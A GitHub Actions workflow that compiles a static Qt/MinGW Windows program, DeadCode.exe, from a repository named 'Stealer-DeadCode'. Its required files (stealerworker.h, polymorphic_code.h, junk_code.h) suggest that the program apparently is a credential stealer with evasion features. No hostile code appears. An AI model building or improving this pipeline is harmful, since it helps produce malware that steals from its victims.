name: Build DeadCode

on:
  push:
    branches:
      - main
  workflow_dispatch:
    inputs:
      cache-buster:
        description: 'Cache buster'
        default: '1'

jobs:
  build-windows:
    runs-on: windows-latest
    timeout-minutes: 120

    steps:
    - name: Checkout repository
      uses: actions/checkout@v4
      with:
        path: Stealer-DeadCode
        fetch-depth: 0

    - name: Setup Python
      uses: actions/setup-python@v5
      with:
        python-version: '3.11'

    - name: Install Python dependencies for aqtinstall
      run: |
        Write-Host "Installing Python dependencies for aqtinstall..."
        python -m pip install --upgrade pip setuptools wheel py7zr==0.22.0
        python -m pip install aqtinstall==3.1.*
        python -m aqt version
      shell: pwsh

    - name: Check available Qt modules
      run: |
        Write-Host "Checking available Qt versions and architectures..."
        python -m aqt list-qt windows desktop
        Write-Host "Checking available architectures for Qt 5.15.2..."
        python -m aqt list-qt windows desktop --arch 5.15.2
        Write-Host "Checking available modules for Qt 5.15.2 with win64_mingw81..."
        python -m aqt list-qt windows desktop --modules 5.15.2 win64_mingw81
        Write-Host "Checking available MinGW tools..."
        python -m aqt list-tool windows desktop tools_mingw
      shell: pwsh
      continue-on-error: true

    - name: Check disk space
      run: |
        Write-Host "Checking available disk space..."
        Get-CimInstance Win32_LogicalDisk -Filter "DeviceID='C:'" | Select-Object DeviceID, @{Name="FreeSpace(GB)";Expression={[math]::Round($_.FreeSpace/1GB,2)}}
      shell: pwsh

    - name: Install MSYS2 and MinGW
      run: |
        Write-Host "Installing MSYS2 and MinGW..."
        choco install msys2 -y
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: Failed to install MSYS2 via Chocolatey"
          exit 1
        }
        Write-Host "Updating MSYS2 and installing MinGW..."
        C:\tools\msys64\usr\bin\bash -lc "pacman -Syu --noconfirm"
        C:\tools\msys64\usr\bin\bash -lc "pacman -S --noconfirm mingw-w64-x86_64-toolchain mingw-w64-x86_64-pcre2 mingw-w64-x86_64-zlib mingw-w64-x86_64-libpng mingw-w64-x86_64-libjpeg"
        Write-Host "Adding MinGW to PATH..."
        $env:Path += ";C:\tools\msys64\mingw64\bin"
        [System.Environment]::SetEnvironmentVariable("Path", $env:Path, [System.EnvironmentVariableTarget]::Process)
        Write-Host "PATH updated: $env:Path"
        Write-Host "Verifying MinGW installation..."
        g++ --version
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: g++ --version failed"
          exit 1
        }
        mingw32-make --version
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: mingw32-make --version failed"
          exit 1
        }
      shell: pwsh

    - name: Install Perl (required for Qt build)
      run: |
        Write-Host "Installing Perl via Chocolatey..."
        choco install strawberryperl -y
        if ($LASTEXITCODE -ne 0 -and $LASTEXITCODE -ne 3010) {
          Write-Host "Error: Failed to install Perl via Chocolatey (exit code: $LASTEXITCODE)"
          exit 1
        }
        Write-Host "Perl installation completed (or already installed)."
        Write-Host "Refreshing environment variables..."
        Import-Module "$env:ChocolateyInstall\helpers\chocolateyProfile.psm1"
        refreshenv
        Write-Host "Verifying Perl installation..."
        perl --version
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: Perl is not installed or not in PATH"
          exit 1
        }
      shell: pwsh

    - name: Cache Qt source
      uses: actions/cache@v4
      with:
        path: C:/QtSrc
        key: qt-source-5.15.2-${{ runner.os }}-${{ github.event.inputs.cache-buster || '1' }}
        restore-keys: |
          qt-source-5.15.2-${{ runner.os }}-

    - name: Clone Qt 5.15.2 source
      if: steps.cache-qt-source.outputs.cache-hit != 'true'
      run: |
        Write-Host "Cloning Qt 5.15.2 source..."
        git clone https://code.qt.io/qt/qt5.git C:/QtSrc
        cd C:/QtSrc
        git checkout v5.15.2
        perl init-repository --module-subset=qtbase,qttools
      shell: pwsh

    - name: Cache Qt build
      uses: actions/cache@v4
      with:
        path: C:/Qt/Qt/5.15.2/mingw81_64_static
        key: qt-5.15.2-static-${{ runner.os }}-v2-${{ github.event.inputs.cache-buster || '1' }}
        restore-keys: |
          qt-5.15.2-static-${{ runner.os }}-

    - name: Patch qfloat16.h to include <limits>
      run: |
        Write-Host "Patching qfloat16.h to include <limits>..."
        $filePath = "C:/QtSrc/qtbase/src/corelib/global/qfloat16.h"
        $content = Get-Content -Path $filePath -Raw
        if (-not ($content -match "#include <limits>")) {
          $newContent = $content -replace "#include <QtCore/qglobal.h>", "#include <QtCore/qglobal.h>`n#include <limits>"
          Set-Content -Path $filePath -Value $newContent
          Write-Host "qfloat16.h patched successfully"
        } else {
          Write-Host "qfloat16.h already contains #include <limits>"
        }
      shell: pwsh

    - name: Patch qbytearraymatcher.h to include <limits>
      run: |
        Write-Host "Patching qbytearraymatcher.h to include <limits>..."
        $filePath = "C:/QtSrc/qtbase/src/corelib/text/qbytearraymatcher.h"
        $content = Get-Content -Path $filePath -Raw
        if (-not ($content -match "#include <limits>")) {
          $newContent = $content -replace "#include <QtCore/qbytearray.h>", "#include <QtCore/qbytearray.h>`n#include <limits>"
          Set-Content -Path $filePath -Value $newContent
          Write-Host "qbytearraymatcher.h patched successfully"
        } else {
          Write-Host "qbytearraymatcher.h already contains #include <limits>"
        }
      shell: pwsh

    - name: Patch qfilesystemengine_win.cpp to avoid FILE_ID_INFO redefinition and add winnt.h
      run: |
        Write-Host "Patching qfilesystemengine_win.cpp to avoid FILE_ID_INFO redefinition and add winnt.h include..."
        $filePath = "C:/QtSrc/qtbase/src/corelib/io/qfilesystemengine_win.cpp"
        $content = Get-Content -Path $filePath -Raw
        if ($content -match "typedef struct _FILE_ID_INFO\s*\{[^}]*\}\s*FILE_ID_INFO,\s*\*PFILE_ID_INFO;") {
          $newContent = $content -replace "typedef struct _FILE_ID_INFO\s*\{[^}]*\}\s*FILE_ID_INFO,\s*\*PFILE_ID_INFO;", ""
          if (-not ($newContent -match "#include <winnt.h>")) {
            $newContent = $newContent -replace "(#include <[^>]+>\s*)+", "$&#include <winnt.h>`n"
          }
          Set-Content -Path $filePath -Value $newContent
          Write-Host "qfilesystemengine_win.cpp patched successfully"
        } else {
          Write-Host "qfilesystemengine_win.cpp does not contain FILE_ID_INFO definition, checking for winnt.h include..."
          if (-not ($content -match "#include <winnt.h>")) {
            $newContent = $content -replace "(#include <[^>]+>\s*)+", "$&#include <winnt.h>`n"
            Set-Content -Path $filePath -Value $newContent
            Write-Host "Added #include <winnt.h> to qfilesystemengine_win.cpp"
          } else {
            Write-Host "qfilesystemengine_win.cpp already includes winnt.h, no patch needed"
          }
        }
      shell: pwsh

    - name: Patch qmake.conf to set _WIN32_WINNT consistently
      run: |
        Write-Host "Patching qmake.conf to set _WIN32_WINNT=0x0602..."
        $filePath = "C:/QtSrc/qtbase/mkspecs/win32-g++/qmake.conf"
        $content = Get-Content -Path $filePath -Raw
        $newContent = $content -replace "-D_WIN32_WINNT=0x[0-9a-fA-F]+", "-D_WIN32_WINNT=0x0602"
        Set-Content -Path $filePath -Value $newContent
        Write-Host "qmake.conf patched successfully"
      shell: pwsh

    - name: Check system resources before Qt build
      run: |
        Write-Host "Checking CPU and memory usage..."
        Get-CimInstance Win32_ComputerSystem | Select-Object @{Name="TotalPhysicalMemory(GB)";Expression={[math]::Round($_.TotalPhysicalMemory/1GB,2)}}, @{Name="FreePhysicalMemory(GB)";Expression={[math]::Round($_.FreePhysicalMemory/1GB,2)}}
        Get-CimInstance Win32_Processor | Select-Object LoadPercentage
      shell: pwsh

    - name: Build static Qt from source
      if: steps.cache-qt-build.outputs.cache-hit != 'true'
      run: |
        Write-Host "Creating build directory for Qt..."
        New-Item -Path C:/QtSrc/build -ItemType Directory -Force
        cd C:/QtSrc/build
        Write-Host "Configuring Qt for static build..."
        & "C:/QtSrc/configure.bat" -static -release -platform win32-g++ -prefix C:/Qt/Qt/5.15.2/mingw81_64_static -opensource -confirm-license -nomake examples -nomake tests -opengl desktop -I C:/vcpkg/installed/x64-mingw-static/include -L C:/vcpkg/installed/x64-mingw-static/lib 2>&1 | Tee-Object -FilePath "qt_configure.log"
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: Qt configure failed. Check qt_configure.log for details."
          Get-Content qt_configure.log
          exit 1
        }
        Write-Host "Building Qt with reduced parallelism..."
        mingw32-make -j1 2>&1 | Tee-Object -FilePath "qt_build.log"
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: Qt build failed. Check qt_build.log for details."
          Get-Content qt_build.log
          exit 1
        }
        Write-Host "Installing Qt..."
        mingw32-make install 2>&1 | Tee-Object -FilePath "qt_install.log"
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: Qt install failed. Check qt_install.log for details."
          Get-Content qt_install.log
          exit 1
        }
      shell: pwsh

    - name: Upload Qt build logs
      if: failure()
      uses: actions/upload-artifact@v4
      with:
        name: qt-build-logs
        path: |
          C:/QtSrc/build/qt_configure.log
          C:/QtSrc/build/qt_build.log
          C:/QtSrc/build/qt_install.log
        if-no-files-found: warn

    - name: Verify Qt installation
      run: |
        Write-Host "Verifying Qt installation..."
        $qmakePath = "C:/Qt/Qt/5.15.2/mingw81_64_static/bin/qmake.exe"
        $uicPath = "C:/Qt/Qt/5.15.2/mingw81_64_static/bin/uic.exe"
        $makePath = "C:/Qt/Qt/5.15.2/mingw81_64_static/bin/mingw32-make.exe"
        $gppPath = "C:/tools/msys64/mingw64/bin/g++.exe"
        if (-not (Test-Path $qmakePath)) {
          Write-Host "Error: qmake.exe not found at $qmakePath"
          dir C:/Qt -Recurse
          exit 1
        }
        if (-not (Test-Path $uicPath)) {
          Write-Host "Error: uic.exe not found at $uicPath"
          dir C:/Qt -Recurse
          exit 1
        }
        if (-not (Test-Path $makePath)) {
          Write-Host "Error: mingw32-make.exe not found at $makePath"
          dir C:/Qt -Recurse
          exit 1
        }
        if (-not (Test-Path $gppPath)) {
          Write-Host "Error: g++.exe not found at $gppPath"
          dir C:/tools/msys64 -Recurse
          exit 1
        }
        $env:Path += ";C:/Qt/Qt/5.15.2/mingw81_64_static/bin;C:/tools/msys64/mingw64/bin"
        [System.Environment]::SetEnvironmentVariable("Path", $env:Path, [System.EnvironmentVariableTarget]::Process)
        Write-Host "PATH: $env:Path"
        Write-Host "Verifying qmake..."
        & $qmakePath --version
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: qmake --version failed"
          exit 1
        }
        Write-Host "Verifying mingw32-make..."
        & $makePath --version
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: mingw32-make --version failed"
          exit 1
        }
        Write-Host "Verifying g++..."
        & $gppPath --version
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: g++ --version failed"
          exit 1
        }
        Write-Host "Qt and MinGW installation completed and verified"
      shell: pwsh

    - name: Cache vcpkg
      uses: actions/cache@v4
      with:
        path: C:/vcpkg
        key: vcpkg-${{ hashFiles('**/vcpkg.json') }}-${{ github.event.inputs.cache-buster || '1' }}
        restore-keys: |
          vcpkg-

    - name: Install vcpkg and dependencies
      run: |
        if (-not (Test-Path C:/vcpkg)) {
          Write-Host "Cloning vcpkg..."
          git clone https://github.com/microsoft/vcpkg.git C:/vcpkg
        }
        Write-Host "Running bootstrap-vcpkg..."
        & C:/vcpkg/bootstrap-vcpkg.bat -disableMetrics
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: Bootstrap failed. Check the logs."
          exit 1
        }
        $vcpkgExe = "C:/vcpkg/vcpkg.exe"
        $env:Path += ";C:/vcpkg"
        [System.Environment]::SetEnvironmentVariable("Path", $env:Path, [System.EnvironmentVariableTarget]::Process)
        Write-Host "vcpkg version after bootstrap:"
        & $vcpkgExe --version
        Write-Host "Installing vcpkg dependencies with triplet x64-mingw-static..."
        & $vcpkgExe install sqlite3 libzip zlib bzip2 curl openssl --triplet x64-mingw-static --clean-after-build 2>&1 | Tee-Object -FilePath "vcpkg_install.log"
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: vcpkg install failed. Check vcpkg_install.log for details."
          Get-Content vcpkg_install.log
          exit 1
        }
        Write-Host "vcpkg installation completed successfully"
      shell: pwsh

    - name: Verify vcpkg installation
      run: |
        $libDir = "C:/vcpkg/installed/x64-mingw-static/lib"
        $includeDir = "C:/vcpkg/installed/x64-mingw-static/include"
        $libs = @("libsqlite3.a", "libzip.a", "libzlib.a", "libbz2.a", "libcurl.a", "libssl.a", "libcrypto.a")
        $headers = @("sqlite3.h", "zip.h", "zlib.h", "bzlib.h", "curl/curl.h", "openssl/ssl.h", "openssl/crypto.h")
        $missing = @()
        foreach ($lib in $libs) {
          if (-not (Test-Path "$libDir/$lib")) {
            $missing += "$lib"
          }
        }
        foreach ($header in $headers) {
          if (-not (Test-Path "$includeDir/$header")) {
            $missing += $header
          }
        }
        if ($missing) {
          Write-Host "Error: Missing libraries or header files: $missing"
          dir $libDir
          dir $includeDir
          dir "$includeDir/curl"
          dir "$includeDir/openssl"
          exit 1
        }
        Write-Host "All vcpkg dependencies verified"
      shell: pwsh

    - name: Verify project structure
      run: |
        cd Stealer-DeadCode
        Write-Host "Current directory: $(Get-Location)"
        $requiredFiles = @(
          "ui/DeadCode.pro",
          "src/main.cpp",
          "ui/mainwindow.ui",
          "ui/mainwindow.cpp",
          "ui/mainwindow.h",
          "src/build_key.h",
          "src/polymorphic_code.h",
          "src/junk_code.h",
          "src/stealerworker.h"
        )
        $missingFiles = @()
        foreach ($file in $requiredFiles) {
          if (-not (Test-Path $file)) {
            $missingFiles += $file
          }
        }
        if ($missingFiles) {
          Write-Host "Error: Missing required files: $missingFiles"
          dir ui -ErrorAction SilentlyContinue
          dir src -ErrorAction SilentlyContinue
          exit 1
        }
        Write-Host "Creating build and release directories..."
        New-Item -Path build -ItemType Directory -Force
        New-Item -Path release -ItemType Directory -Force
        Write-Host "Verifying write access to directories..."
        "Test write access" | Out-File -FilePath "build/test_write.txt"
        "Test write access" | Out-File -FilePath "release/test_write.txt"
        Remove-Item "build/test_write.txt", "release/test_write.txt"
        Write-Host "Project structure verified"
      shell: pwsh

    - name: Verify and generate UI files
      run: |
        cd Stealer-DeadCode
        Write-Host "Generating ui_mainwindow.h..."
        $uicPath = "C:/Qt/Qt/5.15.2/mingw81_64_static/bin/uic.exe"
        if (-not (Test-Path $uicPath)) {
          Write-Host "Error: uic.exe not found at $uicPath"
          exit 1
        }
        & $uicPath ui/mainwindow.ui -o release/ui_mainwindow.h 2>&1 | Tee-Object -FilePath "uic_output.log"
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: uic.exe failed. Check uic_output.log for details."
          Get-Content uic_output.log
          exit 1
        }
        if (-not (Test-Path release/ui_mainwindow.h)) {
          Write-Host "Error: ui_mainwindow.h was not generated"
          exit 1
        }
        Write-Host "ui_mainwindow.h generated successfully"
      shell: pwsh

    - name: Configure and build DeadCode
      run: |
        cd Stealer-DeadCode
        Write-Host "Setting up environment..."
        $env:Path += ";C:/Qt/Qt/5.15.2/mingw81_64_static/bin;C:/vcpkg;C:/tools/msys64/mingw64/bin"
        [System.Environment]::SetEnvironmentVariable("Path", $env:Path, [System.EnvironmentVariableTarget]::Process)
        Write-Host "Updated PATH: $env:Path"
        cd ui
        Write-Host "Running qmake..."
        C:/Qt/Qt/5.15.2/mingw81_64_static/bin/qmake.exe DeadCode.pro CONFIG+=static CONFIG+=staticlib 2>&1 | Tee-Object -FilePath "../qmake_output.log"
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: qmake failed. Check qmake_output.log for details."
          Get-Content ../qmake_output.log
          exit 1
        }
        cd ../build
        Write-Host "Running mingw32-make..."
        C:/Qt/Qt/5.15.2/mingw81_64_static/bin/mingw32-make.exe -f Makefile.Release -j1 2>&1 | Tee-Object -FilePath "../make_output.log"
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: mingw32-make failed. Check make_output.log for details."
          Get-Content ../make_output.log
          exit 1
        }
        Write-Host "Build completed successfully"
      shell: pwsh

    - name: Upload build logs
      if: failure()
      uses: actions/upload-artifact@v4
      with:
        name: build-logs
        path: |
          Stealer-DeadCode/qmake_output.log
          Stealer-DeadCode/make_output.log
          Stealer-DeadCode/uic_output.log
          Stealer-DeadCode/vcpkg_install.log
        if-no-files-found: warn

    - name: Upload artifact
      uses: actions/upload-artifact@v4
      with:
        name: DeadCode-Build
        path: Stealer-DeadCode/build/DeadCode.exe
        if-no-files-found: error

    - name: Cleanup
      if: always()
      run: |
        Remove-Item -Path "Stealer-DeadCode/build" -Recurse -Force -ErrorAction SilentlyContinue
        Remove-Item -Path "Stealer-DeadCode/release" -Recurse -Force -ErrorAction SilentlyContinue
      shell: pwsh